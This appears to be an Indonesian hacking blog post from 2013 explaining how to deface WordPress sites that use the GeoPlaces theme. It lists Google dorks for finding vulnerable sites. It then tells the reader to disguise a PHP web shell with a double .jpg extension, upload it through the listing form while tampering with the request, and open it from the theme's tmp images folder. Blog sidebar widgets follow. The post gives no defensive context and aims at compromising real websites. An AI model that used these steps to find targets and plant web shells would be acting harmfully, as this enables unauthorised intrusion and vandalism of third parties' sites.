Minggu, 24 Maret 2013

Cara Deface Dengan Shell upload vulnerability 

Langsung aja 
 
Dork    :

inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)" 

Site:: 
- http://site.com/?ptype=post_listing
- http://site.com/?ptype=post_event
- http://site.com/path/?ptype=post_listing
- http://site.com/path/?ptype=post_event 
 
Sebelumnya Rename dulu Shellmu jadi ext. jpg
cth: shell.php.jpg / shell.php;.jpg
Upload shellmu,, gunakan tamper data.  Silahkan Lihat Cara Tamper Data (Upload PHP File) 
 

 
Hasilnya bisa dilihat
- http://site.com/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
- http://site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
 
bisa di liat videonya disini
 
http://www.youtube.com/watch?v=kfyg4Oag8I0&feature=player_embedded 
 
 
 sumber : http://indocyberarmy.blogspot.com 
 
 
Diposting oleh vergos di 23.10

Visitor

Translite

English French German Spain Italian Dutch
Russian Portuguese Japanese Korean Arabic Chinese Simplified

music

Buku tamu

Followers

Facebook

Panel Admin

Status Panel Admin
Jam Sekarang
Tanggal
Salam Sapa : Welcome to My Blog
Status Admin : Online
User :

Contact Me